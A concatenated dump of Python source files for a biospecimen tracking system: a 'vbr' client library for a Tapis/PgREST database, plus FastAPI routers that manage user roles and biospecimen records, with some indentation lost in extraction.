"""Update Container status by status.name"""
new_status = self._status_from_status_name(status_name, "container")
return self._update_row_status(container, new_status, comment)
def update_measurement_status_by_name(
self, measurement: Measurement, status_name: str, comment: str = None
) -> Measurement:
"""Update Measurement status by status.name"""
new_status = self._status_from_status_name(status_name, "measurement")
return self._update_row_status(measurement, new_status, comment)
def update_shipment_status_by_name(
self, shipment: Shipment, status_name: str, comment: str = None
) -> Shipment:
"""Update Shipment status by status.name"""
new_status = self._status_from_status_name(status_name, "shipment")
return self._update_row_status(shipment, new_status, comment)
def update_sysevent_status_by_name(
self, sys_event: SysEvent, status_name: str, comment: str = None
) -> SysEvent:
"""Update SysEvent status by status.name"""
new_status = self._status_from_status_name(status_name, "sysevent")
return self._update_row_status(sys_event, new_status, comment)
def _get_vbr_row_status(self, vbr_row: Table) -> Status:
"""Get Status for the provided VBR row."""
if getattr(vbr_row, "status", None) is None:
            raise ValueError(
                "Cannot get status of <{0}> object".format(
                    vbr_row.__schema__.table_name
                )
            )
return StatusApi.get_status(self, vbr_row.status)
def get_container_status(self, container: Container) -> Status:
"""Get current Status for a Container."""
return self._get_vbr_row_status(container)
def get_measurement_status(self, measurement: Measurement) -> Status:
"""Get current Status for a Measurement."""
return self._get_vbr_row_status(measurement)
def get_shipment_status(self, shipment: Shipment) -> Status:
"""Get current Status for a Shipment."""
return self._get_vbr_row_status(shipment)
def get_sysevent_status(self, sys_event: SysEvent) -> Status:
"""Get current Status for a SysEvent."""
return self._get_vbr_row_status(sys_event)
```
#### File: vbr/api/measurement.py
```python
from typing import List
from vbr.pgrest.time import timestamp
from vbr.tableclasses import Biosample, Container, Measurement
from vbr.utils import utc_time_in_seconds
from .data_event import DataEventApi
__all__ = ["MeasurementApi"]
class MeasurementApi(object):
def get_measurement(self, pkid: str) -> Measurement:
"""Retrieve a Measurement by primary identifier."""
return self._get_row_from_table_with_id("measurement", pkid)
def get_measurement_by_local_id(self, local_id: str) -> Measurement:
"""Retrieve a Measurement by local_id."""
return self._get_row_from_table_with_local_id("measurement", local_id)
def get_measurement_by_tracking_id(self, tracking_id: str) -> Measurement:
"""Retrieve a Measurement by tracking_id."""
return self._get_row_from_table_with_tracking_id("measurement", tracking_id)
def create_measurement(
self,
tracking_id: str,
biosample_id: int,
project_id: int,
measurement_type_id: int,
unit_id: int,
container_id: int,
status_id: int,
creation_timestr: str = None,
) -> Measurement:
"""Create a new Measurement."""
# TODO - data_event
bs = Measurement(
tracking_id=tracking_id,
biosample=biosample_id,
project=project_id,
measurement_type=measurement_type_id,
unit=unit_id,
container=container_id,
status=status_id,
creation_time=creation_timestr,
)
try:
return self.vbr_client.create_row(bs)[0]
except Exception:
raise
def create_or_get_measurement_by_tracking_id(
self,
tracking_id: str,
biosample_id: int,
project_id: int,
measurement_type_id: int,
unit_id: int,
container_id: int,
status_id: int,
creation_timestr: str = None,
) -> Measurement:
"""Create a Measurement or return existing with specified tracking_id."""
try:
return self.create_measurement(
tracking_id,
biosample_id,
project_id,
measurement_type_id,
unit_id,
container_id,
status_id,
creation_timestr,
)
except Exception:
return self.get_measurement_by_tracking_id(tracking_id)
def partition_measurement(
self, measurement: Measurement, tracking_id: str = None, comment: str = None
) -> Measurement:
"""Create a sub-Measuremenent from a Measurement."""
# 1. Clone the original Measurement to a new Measurement,
m2 = measurement.clone()
m2.measurement_id = None
m2.local_id = None
m2.creation_time = timestamp()
# Append timestamp to extant tracking_id if one not provided
if tracking_id is not None:
m2.tracking_id = tracking_id
else:
m2.tracking_id = measurement.tracking_id + "." + utc_time_in_seconds()
m2 = self.vbr_client.create_row(m2)[0]
# TODO Register the relation via MeasurementFromMeasurement table
DataEventApi.create_and_link(
self,
comment="Partitioned to {0}".format(m2.local_id),
link_target=measurement,
)
return m2
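    # Illustrative (epoch value assumed): partitioning a Measurement tracked
    # as "SAMPLE-1" without an explicit tracking_id yields a clone tracked as
    # something like "SAMPLE-1.1646157845" (original id plus UTC seconds).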
def get_measurement_partitions(self, measurement: Measurement) -> List[Measurement]:
"""Retrieve Measurements partioned from a Measurment."""
# Query MeasurementFromMeasurement table
        raise NotImplementedError()
def get_measurements_in_container(self, container: Container) -> List[Measurement]:
"""Retrieve Measurements in a Container."""
query = {"container": {"operator": "=", "value": container.container_id}}
return self.vbr_client.query_rows(
root_url="measurement", query=query, limit=1000000
)
def get_measurements_in_biosample(self, biosample: Biosample) -> List[Measurement]:
"""Retrieve Measurements in a Biosample."""
query = {"biosample": {"operator": "=", "value": biosample.biosample_id}}
return self.vbr_client.query_rows(
root_url="measurement", query=query, limit=1000000
)
```
#### File: vbr/api/organization.py
```python
from vbr.tableclasses import Organization
__all__ = ["OrganizationApi"]
class OrganizationApi(object):
def get_organization(self, pkid: str) -> Organization:
"""Retrieve a Organization by primary identifier."""
return self._get_row_from_table_with_id("organization", pkid)
def get_organization_by_name(self, name: str) -> Organization:
"""Retrieve a Organization by name."""
query = {"name": {"operator": "=", "value": name}}
return self._get_row_from_table_with_query("organization", query)
```
#### File: vbr/api/utils.py
```python
import uuid
__all__ = ["generate_guid"]
def generate_guid() -> str:
"""Generate a GUID."""
return str(uuid.uuid4()).upper()
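# Illustrative (output is random): generate_guid() might return
# "9F2C1E36-5A7B-4D10-8C2E-0B6A1F3D9E42", an uppercased UUID4 string.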
```
#### File: vbr/client/connection.py
```python
import logging
import os
import uuid
from typing import Any, NoReturn
import requests
from tapipy.tapis import Tapis, TapisResult
logging.basicConfig(level=logging.CRITICAL)
__all__ = ["Connection", "TapisUserEnv", "TapisDirectClient"]
class Connection(object):
"""Provides a PgREST client"""
def __init__(self, tapis_client: Tapis, session=None, auto_connect=True):
if session is None:
self.session = uuid.uuid4().hex
else:
self.session = str(session)
logging.debug("VBR Session: " + self.session)
self.client = tapis_client
if auto_connect:
self.connect()
def connect(self, tapis_client: Tapis = None) -> NoReturn:
if tapis_client is not None:
self.client = tapis_client
# try:
# self.client.get_tokens()
# except Exception:
# # Probably running inside an Actor where this won't work
# pass
class TapisUserEnv(Tapis):
"""Supports initialization of a Tapis user client from env vars"""
def __init__(self, **kwargs):
super().__init__(
base_url=os.environ["VBR_HOST"],
username=os.environ["VBR_USERNAME"],
password=os.environ["VBR_PASSWORD"],
**kwargs
)
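# Minimal usage sketch (environment values assumed): with VBR_HOST,
# VBR_USERNAME and VBR_PASSWORD exported,
#   client = TapisUserEnv()
#   client.get_tokens()
# yields an authenticated Tapis client suitable for Connection().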
class TapisDirectClient(object):
"""Requests client bootstrapped from a Tapis API client
The intended use is to implement methods not expressed by the
current OpenAPI spec and which are thus not accessible in TapiPy.
"""
VERBOSE_ERRORS = True
def __init__(self, tapis_client):
# TODO - Catch when client is missing properties
# token = tapis_client.token.token_info['access_token']
# Always refresh when using a requests call
try:
token = tapis_client.access_token.access_token
except AttributeError:
token = tapis_client.access_token
self.user_agent = "TapisDirectClient/1.0"
self.api_server = tapis_client.base_url
self.api_key = tapis_client.client_id
self.api_secret = tapis_client.client_key
self.verify = tapis_client.verify
self.service_name = None
self.service_version = None
self.api_path = None
self.headers = {"user-agent": self.user_agent}
# Only send Bearer if token is provided
if token:
self.headers["X-Tapis-Token"] = "{}".format(token)
def setup(self, service_name, service_version="v3", api_path=None):
setattr(self, "service_name", service_name)
setattr(self, "service_version", service_version)
setattr(self, "api_path", api_path)
def build_url(self, *args):
arg_els = args
path_els = [self.service_version, self.service_name, self.api_path]
path_els.extend(arg_els)
# TODO - Filter for leading slashes in path_els
# TODO - Strip trailing slash from api_server
url_path_els = [self.api_server]
url_path_els.extend(path_els)
url_path_els = [u for u in url_path_els if u is not None]
return "/".join(url_path_els)
def get(self, path=None):
url = self.build_url(path)
resp = requests.get(url, headers=self.headers, verify=self.verify)
# show_curl(resp, verify=self.verify)
resp = self._raise_for_status(resp)
# resp.raise_for_status()
return resp.json().get("result", {})
def delete(self, path=None):
url = self.build_url(path)
resp = requests.delete(url, headers=self.headers, verify=self.verify)
# show_curl(resp, verify=self.verify)
resp = self._raise_for_status(resp)
# resp.raise_for_status()
return resp.json().get("result", {})
def get_bytes(self, path=None):
url = self.build_url(path)
resp = requests.get(url, headers=self.headers, verify=self.verify)
# show_curl(resp, verify=self.verify)
resp = self._raise_for_status(resp)
# resp.raise_for_status()
return resp
def get_data(self, path=None, params={}):
url = self.build_url(path)
resp = requests.get(
url, headers=self.headers, params=params, verify=self.verify
)
# show_curl(resp, verify=self.verify)
resp = self._raise_for_status(resp)
# resp.raise_for_status()
return resp.json().get("result", {})
def post(self, path=None, data=None, content_type=None, json=None, params=None):
url = self.build_url(path)
post_headers = self.headers
if content_type is not None:
post_headers["Content-type"] = content_type
resp = requests.post(
url,
data=data,
headers=post_headers,
params=params,
json=json,
verify=self.verify,
)
# show_curl(resp, verify=self.verify)
resp = self._raise_for_status(resp)
# Some direct POST actions are management actions that return only a
# message. Thus we try to return "result" first, then fail over
# to returning "message" before handling the most annoying case where
# no response is returned, in which case an empty dict is the
# appropriate response. If there is no JSON available at all,
# return the response body as bytes.
try:
result = resp.json().get("result", resp.json().get("message", {}))
        except ValueError:  # covers json.JSONDecodeError
result = resp.content
return result
def post_data_basic(self, data=None, auth=None, path=None, content_type=None):
url = self.build_url(path)
post_headers = {"user-agent": self.user_agent}
if content_type is not None:
post_headers["Content-type"] = content_type
if auth is None:
auth = (self.api_key, self.api_secret)
resp = requests.post(
url, headers=post_headers, auth=auth, data=data, verify=self.verify
)
# show_curl(resp, verify=self.verify)
resp = self._raise_for_status(resp)
# The use case for post_data_basic is communicating with
# Tapis APIs that accept only Basic Auth. These include all
# the API manager APIs, and the appropriate response is to
# return the entire JSON payload since APIM responses do not
# adhere to the (status, version, result) structure favored
# by the core Tapis APIs
return resp.json()
def _raise_for_status(self, resp):
"""Handler for requests raise_for_status to capture message from API server responses"""
try:
resp.raise_for_status()
except requests.exceptions.HTTPError as h:
if self.VERBOSE_ERRORS:
# Extract the API JSON message and attach it
# to the HTTPError object before raising it
code = h.response.status_code
reason = h.response.reason + " for " + h.response.url
try:
message = h.response.json().get("message")
except Exception:
message = h.response.text
raise requests.exceptions.HTTPError(
code, reason, message, response=h.response, request=h.request
)
else:
raise h
return resp
# NOTE - One idea is to implement left/right relations in the connection class.
# For example, do a retrieve on an object, then inspect to see if it has
# any relations. If so, retrieve the related object and attach it to
# the current one as a named property. This would be done recursively
# through the related object tree. Rendering to a dict/JSON for
# consumption/usage would be recursive as well. We would not directly
# support updates. Deletes should be supported implicitly via built-in
# foreign key on_delete behavior.
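#
# A minimal sketch of that idea, kept as a comment since none of these
# helpers exist yet; relations() and retrieve() are hypothetical:
#
#   def resolve(obj, retrieve, depth=2):
#       if depth <= 0:
#           return obj
#       for attr, (table, fk) in obj.relations().items():
#           related = retrieve(table, fk)
#           setattr(obj, attr, resolve(related, retrieve, depth - 1))
#       return obj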
```
#### File: vbr/pgrest/foreign_key.py
```python
from .config import Config
__all__ = ["ForeignKey"]
ON_EVENT_ALLOWED = ["ON DELETE", "ON UPDATE"]
EVENT_ACTION_ALLOWED = ["CASCADE", "SET NULL", "SET DEFAULT", "RESTRICT", "NO ACTION"]
class ForeignKey(object):
def __init__(self, source, on_event="ON DELETE", event_action="RESTRICT"):
self.foreign_key = True
(self.reference_table, self.reference_column) = source.split(".")
self.on_event = None
self.event_action = None
if on_event:
on_event = on_event.upper()
if on_event not in ON_EVENT_ALLOWED:
raise ValueError("Invalid value {0} for on_event".format(on_event))
else:
self.on_event = on_event
if event_action:
event_action = event_action.upper()
if event_action not in EVENT_ACTION_ALLOWED:
raise ValueError(
"Invalid value {0} for event_action".format(event_action)
)
else:
self.event_action = event_action
def properties(self):
data = {
"foreign_key": self.foreign_key,
"reference_table": self.reference_table,
"reference_column": self.reference_column,
}
if self.on_event:
data["on_event"] = self.on_event
if self.event_action:
data["event_action"] = self.event_action
return data
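# Illustrative (defaults shown): ForeignKey("container.container_id").properties()
# returns {"foreign_key": True, "reference_table": "container",
# "reference_column": "container_id", "on_event": "ON DELETE",
# "event_action": "RESTRICT"}.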
```
#### File: vbr/pgrest/table.py
```python
import copy
import datetime
import json
from .column import Column
from .constraints import Constraint
from .enums import Enumeration
from .schema import PgrestSchema
from .utils import datetime_to_isodate
__all__ = ["Table", "AssociationTable"]
class Table(object):
"""PgREST Table"""
__tablename__ = None
__rooturl__ = None
# TODO - support for generating create/update JSON for PgREST
def __init__(self, table_id=None, **kwargs):
self.__table_id__ = table_id
self.__class_attrs__ = {}
self.__schema__ = PgrestSchema(self)
# This supports logging the original value for attrs implemented in __setattr__ below
self.__original_attrs__ = {}
# Move class-defined attributes into a private var
# Create regular properties holding values passed in via constructor
for aname in dir(self):
attr = getattr(self, aname)
if isinstance(attr, (Enumeration, Constraint)):
self.__class_attrs__[aname] = attr
# TODO - use validate() from attr
setattr(self, aname, kwargs.get(aname, None))
if isinstance(attr, Column):
self.__class_attrs__[aname] = attr
# TODO - use validate() from attr
setattr(self, aname, attr.ctype.instantiate(kwargs.get(aname, None)))
# Set _pkid
# Helpful for update and other maintenance tasks
setattr(self, "_pkid", kwargs.get("_pkid", None))
def __repr__(self):
values = []
for v in self.__schema__.column_names:
values.append("{0}={1}".format(v, getattr(self, v, None)))
return "{0}: {1}".format(self.__class__.__name__, ",".join(values))
def __setattr__(self, key, value):
"""Capture original attribute values specified at instantiation before allowing them to be updated."""
# This supports the ability to know what attributes
# have changed in support of doing a vbr.update_row(object)
try:
current = getattr(self, key)
if not isinstance(current, Column):
if key not in self.__original_attrs__:
self.__original_attrs__[key] = current
except Exception:
pass
super().__setattr__(key, value)
    def updates(self) -> dict:
        """Return the original values of attributes changed since instantiation."""
        return self.__original_attrs__
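    # Illustrative (table and values assumed): after
    #   row = SomeTable(name="a"); row.name = "b"
    # row.updates() holds the pre-update value, i.e. {"name": "a"}.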
def clone(self):
"""Return a mutable clone of this VBR object."""
return copy.deepcopy(self)
def dict(self):
"""Return a dict filtered for use in row insert or update operations"""
dct = {}
for v in self.__schema__.column_names:
_d = getattr(self, v, None)
# Cast to proper Python type
d = self.__class_attrs__[v].ctype.cast(_d)
# Do not populate dict with None values where attribute is a primary key
# Do not populate dict with None values if attribute is nullable
nullable = self.__class_attrs__[v].nullable
is_pk = self.__class_attrs__[v].primary_key
if d is not None:
dct[v] = d
elif nullable is False and is_pk is False:
dct[v] = d
return dct
def json(self, indent=0, sort_keys=True, class_name=None):
# TODO - deal with datetime
return json.dumps(
self.dict(), indent=indent, sort_keys=sort_keys, cls=class_name
)
def primary_key_id(self):
"""Return value of VBR row primary key."""
return getattr(self, "_pkid", None)
class AssociationTable(Table):
__left__ = None
__right__ = None
```
#### File: vbr/utils/time.py
```python
import datetime
import pytz
__all__ = ["timestamp", "utc_time_in_seconds"]
def timestamp() -> datetime.datetime:
"""Returns the current UTC-localized datetime"""
tz = pytz.timezone("UTC")
return tz.localize(datetime.datetime.utcnow())
def utc_time_in_seconds() -> str:
"""Return string of UTC time in seconds."""
return str(int(datetime.datetime.today().timestamp()))
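# Illustrative values (clock assumed): timestamp() returns a UTC-aware
# datetime such as 2022-03-01 18:04:05.123456+00:00, and
# utc_time_in_seconds() returns the matching epoch string, e.g. "1646157845".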
``` |
{
"source": "a2cps/vbr-app",
"score": 2
} |
#### File: application/internal/admin.py
```python
from datetime import datetime
from enum import Enum
from fastapi import APIRouter, Body, Depends, HTTPException
from pydantic import BaseModel, EmailStr
from tapipy.tapis import Tapis
from ..config import get_settings
from ..dependencies import *
settings = get_settings()
router = APIRouter(
prefix="/admin",
tags=["admin"],
responses={404: {"description": "Not found"}},
route_class=LoggingRoute,
)
class GrantableRole(Enum):
VBR_ADMIN = "VBR_ADMIN"
VBR_READ_ANY_PHI = "VBR_READ_ANY_PHI"
VBR_READ_LIMITED_PHI = "VBR_READ_LIMITED_PHI"
VBR_READ_PUBLIC = "VBR_READ_PUBLIC"
VBR_WRITE_ANY = "VBR_WRITE_ANY"
VBR_WRITE_PUBLIC = "VBR_WRITE_PUBLIC"
class Role(Enum):
VBR_USER = "VBR_USER"
VBR_ADMIN = "VBR_ADMIN"
VBR_READ_ANY_PHI = "VBR_READ_ANY_PHI"
VBR_READ_LIMITED_PHI = "VBR_READ_LIMITED_PHI"
VBR_READ_PUBLIC = "VBR_READ_PUBLIC"
VBR_WRITE_ANY = "VBR_WRITE_ANY"
VBR_WRITE_PUBLIC = "VBR_WRITE_PUBLIC"
"VBR_READ_ANY", "VBR_READ_ANY_PHI", "VBR_READ_LIMITED_PHI", "VBR_READ_PUBLIC", "VBR_USER", "VBR_WRITE_PUBLIC"
class TapisRole(BaseModel):
name: str
description: str
owner: str
# updated: datetime
# updatedby: str
class Config:
schema_extra = {
"example": {
"name": "TACO_USER",
"description": "Default user role",
"owner": "tacobot",
}
}
class User(BaseModel):
username: str
name: str
email: EmailStr
class Config:
schema_extra = {
"example": {
"username": "tacobot",
"name": "<NAME>",
"email": "<EMAIL>",
}
}
class AddUser(BaseModel):
username: str
role: Optional[Role] = "VBR_READ_PUBLIC"
class Config:
schema_extra = {"example": {"username": "tacobot", "role": "VBR_READ_PUBLIC"}}
def build_user(username: str, client: Tapis) -> User:
profile = client.authenticator.get_profile(username=username)
user = {
"username": profile.username,
"name": "{0} {1}".format(profile.given_name, profile.last_name),
"email": profile.email,
}
return user
@router.get(
"/roles",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=List[TapisRole],
)
def list_roles(client: Tapis = Depends(tapis_client)):
"""List VBR roles."""
role_names = client.sk.getRoleNames(tenant=settings.tapis_tenant_id).names
roles = []
for rn in role_names:
if rn in [e.value for e in Role]:
role = client.sk.getRoleByName(tenant=settings.tapis_tenant_id, roleName=rn)
roles.append(
{
"name": role.name,
"description": role.description,
"owner": role.owner,
}
)
return roles
@router.get(
"/users",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=List[User],
)
def list_users(client: Tapis = Depends(tapis_client)):
"""List authorized users."""
usernames = client.sk.getUsersWithRole(
tenant=settings.tapis_tenant_id, roleName="VBR_USER"
).names
users = [build_user(u, client) for u in usernames]
return users
@router.post(
"/users",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=User,
)
def add_user(body: AddUser = Body(...), client: Tapis = Depends(tapis_client)):
"""Add an authorized user."""
try:
client.sk.grantRole(
tenant=settings.tapis_tenant_id,
user=body.username,
roleName=body.role.value,
)
return build_user(username=body.username, client=client)
except Exception:
raise
@router.get(
"/user/{username}",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=User,
)
def get_user(username: str, client: Tapis = Depends(tapis_client)):
"""Get profile of an authorized user."""
if (
"VBR_USER"
in client.sk.getUserRoles(user=username, tenant=settings.tapis_tenant_id).names
):
user_profile = build_user(username, client)
return User(**user_profile)
else:
raise HTTPException(status_code=404, detail="Not an authorized VBR user")
@router.get(
"/user/{username}/roles",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=List[Role],
)
def list_user_roles(username: str, client: Tapis = Depends(tapis_client)):
"""List roles for an authorized user."""
roles = [
r
for r in client.sk.getUserRoles(
tenant=settings.tapis_tenant_id, user=username
).names
if r in [e.value for e in Role]
]
roles = sorted(roles)
return roles
@router.put(
"/user/{username}/roles",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=List[Role],
)
def grant_user_role(
username: str,
role: GrantableRole = "VBR_READ_PUBLIC",
client: Tapis = Depends(tapis_client),
):
"""Grant a role to a user."""
client.sk.grantRole(
tenant=settings.tapis_tenant_id, user=username, roleName=role.value
)
# Return list of roles for user
roles = [
r
for r in client.sk.getUserRoles(
tenant=settings.tapis_tenant_id, user=username
).names
if r in [e.value for e in Role]
]
roles = sorted(roles)
return roles
@router.delete(
"/user/{username}/roles/{role}",
dependencies=[Depends(tapis_client), Depends(vbr_admin)],
response_model=List[Role],
)
def revoke_user_role(username: str, role: Role, client: Tapis = Depends(tapis_client)):
"""Revoke a role from a user.
Note: Inherited roles (such as VBR_USER) cannot be revoked using this method.
"""
client.sk.revokeUserRole(
tenant=settings.tapis_tenant_id, user=username, roleName=role.value
)
roles = [
r
for r in client.sk.getUserRoles(
tenant=settings.tapis_tenant_id, user=username
).names
if r in [e.value for e in Role]
]
roles = sorted(roles)
return roles
```
#### File: application/routers/biospecimens.py
```python
from typing import Dict
from fastapi import APIRouter, Body, Depends, HTTPException
from vbr.api import VBR_Api, measurement
from vbr.utils.barcode import generate_barcode_string, sanitize_identifier_string
from application.routers.models.actions import comment, trackingid
from ..dependencies import *
from .models import (
Biospecimen,
BiospecimenPrivate,
BiospecimenPrivateExtended,
Comment,
CreateComment,
Event,
GenericResponse,
PartitionBiospecimen,
RunListBase,
SetBiospecimenStatus,
SetContainer,
SetTrackingId,
SetVolume,
transform,
)
from .utils import parameters_to_query
router = APIRouter(
prefix="/biospecimens",
tags=["biospecimens"],
responses={404: {"description": "Not found"}},
route_class=LoggingRoute,
)
@router.get(
"/", dependencies=[Depends(vbr_read_public)], response_model=List[Biospecimen]
)
def list_biospecimens(
# See views/biospecimens_details.sql for possible filter names
biospecimen_id: Optional[str] = None,
tracking_id: Optional[str] = None,
biospecimen_type: Optional[str] = None,
collection_id: Optional[str] = None,
collection_tracking_id: Optional[str] = None,
container_id: Optional[str] = None,
container_tracking_id: Optional[str] = None,
location_id: Optional[str] = None,
location_display_name: Optional[str] = None,
protocol_name: Optional[str] = None,
project: Optional[str] = None,
status: Optional[str] = None,
unit: Optional[str] = None,
subject_id: Optional[str] = None,
subject_guid: Optional[str] = None,
bscp_procby_initials: Optional[str] = None,
bscp_protocol_dev: Optional[bool] = None,
client: VBR_Api = Depends(vbr_admin_client),
common=Depends(limit_offset),
):
"""List Biospecimens.
Refine results using filter parameters.
Requires: **VBR_READ_PUBLIC**"""
query = parameters_to_query(
biospecimen_id=biospecimen_id,
tracking_id=tracking_id,
biospecimen_type=biospecimen_type,
collection_id=collection_id,
collection_tracking_id=collection_tracking_id,
container_id=container_id,
container_tracking_id=container_tracking_id,
location_id=location_id,
location_display_name=location_display_name,
protocol_name=protocol_name,
project=project,
status=status,
unit=unit,
subject_id=subject_id,
subject_guid=subject_guid,
bscp_procby_initials=bscp_procby_initials,
bscp_protocol_dev=bscp_protocol_dev,
)
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="biospecimens_details",
query=query,
limit=common["limit"],
offset=common["offset"],
)
]
return rows
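# Illustrative (assumed helper behavior): parameters_to_query drops None
# parameters and builds the PgREST-style filters used throughout this module,
# e.g. project="MCC1" becomes {"project": {"operator": "eq", "value": "MCC1"}}.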
# GET /private
@router.get(
"/private",
dependencies=[Depends(vbr_read_limited_phi)],
response_model=List[BiospecimenPrivate],
)
def list_biospecimens_with_limited_phi(
client: VBR_Api = Depends(vbr_admin_client), common=Depends(limit_offset)
):
"""List Biospecimens with limited PHI.
Requires: **VBR_READ_LIMITED_PHI**"""
# TODO - build up from filters
query = {}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="biospecimens_details_private",
query=query,
limit=common["limit"],
offset=common["offset"],
)
]
return rows
# GET /{biospecimen_id}
@router.get(
"/{biospecimen_id}",
dependencies=[Depends(vbr_read_public)],
response_model=Biospecimen,
)
def get_biospecimen_by_id(
biospecimen_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get a Biospecimen by ID.
Requires: **VBR_READ_PUBLIC**"""
query = {"biospecimen_id": {"operator": "eq", "value": biospecimen_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# POST /{biospecimen_id}/partition
@router.post(
"/{biospecimen_id}/partition",
dependencies=[Depends(vbr_write_public)],
response_model=Biospecimen,
)
def partition_biospecimen(
biospecimen_id: str,
body: PartitionBiospecimen = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Partition a Biospecimen into two Biospecimens.
    Requires: **VBR_WRITE_PUBLIC**
"""
    biospecimen_id = sanitize_identifier_string(biospecimen_id)
    new_tracking_id = sanitize_identifier_string(body.tracking_id)
measurement = client.get_measurement_by_local_id(biospecimen_id)
new_measurement = client.partition_measurement(
        measurement, volume=body.volume, tracking_id=new_tracking_id, comment=body.comment
)
query = {"biospecimen_id": {"operator": "eq", "value": new_measurement.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# DELETE /{biospecimen_id}
@router.delete(
"/{biospecimen_id}/partition",
dependencies=[Depends(vbr_admin)],
response_model=GenericResponse,
)
def delete_biospecimen(
biospecimen_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Delete a Biospecimen from the system.
    Requires: **VBR_ADMIN**
"""
    biospecimen_id = sanitize_identifier_string(biospecimen_id)
measurement = client.get_measurement_by_local_id(biospecimen_id)
client.vbr_client.delete_row(measurement)
return {"message": "Biospecimen deleted"}
@router.get(
"/{biospecimen_id}/private",
dependencies=[Depends(vbr_read_any_phi)],
response_model=BiospecimenPrivateExtended,
)
def get_biospecimen_by_id_with_extended_phi(
biospecimen_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get a Biospecimen with extended PHI by ID.
Requires: **VBR_READ_ANY_PHI**"""
    biospecimen_id = sanitize_identifier_string(biospecimen_id)
query = {"biospecimen_id": {"operator": "eq", "value": biospecimen_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details_private", query=query, limit=1, offset=0
)[0]
)
return row
# GET /tracking/{tracking_id}
@router.get(
"/tracking/{tracking_id}",
dependencies=[Depends(vbr_read_public)],
response_model=Biospecimen,
)
def get_biospecimen_by_tracking_id(
tracking_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get a Biospecimen by Tracking ID.
Requires: **VBR_READ_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
query = {"tracking_id": {"operator": "eq", "value": tracking_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# PATCH /{biospecimen_id}/container
@router.patch(
"/{biospecimen_id}/container",
dependencies=[Depends(vbr_write_public)],
response_model=Biospecimen,
)
def update_biospecimen_container(
biospecimen_id: str,
body: SetContainer = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Move a Biospecimen to another Container.
Requires: **VBR_WRITE_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
container_id = sanitize_identifier_string(body.container_id)
measurement = client.rebox_measurement_by_local_id(
local_id=biospecimen_id, container_local_id=container_id
)
query = {"biospecimen_id": {"operator": "eq", "value": measurement.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# PATCH /{biospecimen_id}/status
@router.patch(
"/{biospecimen_id}/status",
dependencies=[Depends(vbr_write_public)],
response_model=Biospecimen,
)
def update_biospecimen_status(
biospecimen_id: str,
body: SetBiospecimenStatus = Body(...),
    client: VBR_Api = Depends(vbr_admin_client),
):
"""Update Biospecimen status.
Requires: **VBR_WRITE_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
measurement = client.get_measurement_by_local_id(biospecimen_id)
measurement = client.update_measurement_status_by_name(
measurement, status_name=body.status.value, comment=body.comment
)
# TODO - take any requisite actions associated with specific statuses
query = {"biospecimen_id": {"operator": "eq", "value": measurement.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# PATCH /{biospecimen_id}/tracking_id
@router.patch(
"/{biospecimen_id}/tracking_id",
    dependencies=[Depends(vbr_write_public)],
response_model=Biospecimen,
)
def update_biospecimen_tracking_id(
biospecimen_id: str,
body: SetTrackingId = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Update a Biospecimen tracking ID.
Requires: **VBR_WRITE_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
tracking_id = sanitize_identifier_string(body.tracking_id)
# TODO propagate comment
measurement = client.get_measurement_by_local_id(biospecimen_id)
measurement.tracking_id = tracking_id
measurement = client.vbr_client.update_row(measurement)
query = {"biospecimen_id": {"operator": "eq", "value": measurement.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# PATCH /{biospecimen_id}/volume
@router.patch(
"/{biospecimen_id}/volume",
dependencies=[Depends(vbr_write_public)],
response_model=Biospecimen,
)
def update_biospecimen_volume(
biospecimen_id: str,
body: SetVolume = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Update a Biospecimen volume.
Requires: **VBR_WRITE_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
volume = body.volume
comment = body.comment
measurement = client.get_measurement_by_local_id(biospecimen_id)
measurement = client.set_volume(measurement, volume, comment)
query = {"biospecimen_id": {"operator": "eq", "value": measurement.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="biospecimens_details", query=query, limit=1, offset=0
)[0]
)
return row
# GET /{biospecimen_id}/events
@router.get(
"/{biospecimen_id}/events",
dependencies=[Depends(vbr_read_public)],
response_model=List[Event],
)
def get_events_for_biospecimen(
biospecimen_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get Events for a Biospecimen.
Requires: **VBR_READ_PUBLIC**"""
biospecimen_id = sanitize_identifier_string(biospecimen_id)
query = {"biospecimen_id": {"operator": "=", "value": biospecimen_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="biospecimens_data_events_public",
query=query,
limit=0,
offset=0,
)
]
return rows
# GET /{biospecimen_id}/comments
@router.get(
"/{biospecimen_id}/comments",
dependencies=[Depends(vbr_read_public)],
response_model=List[Comment],
)
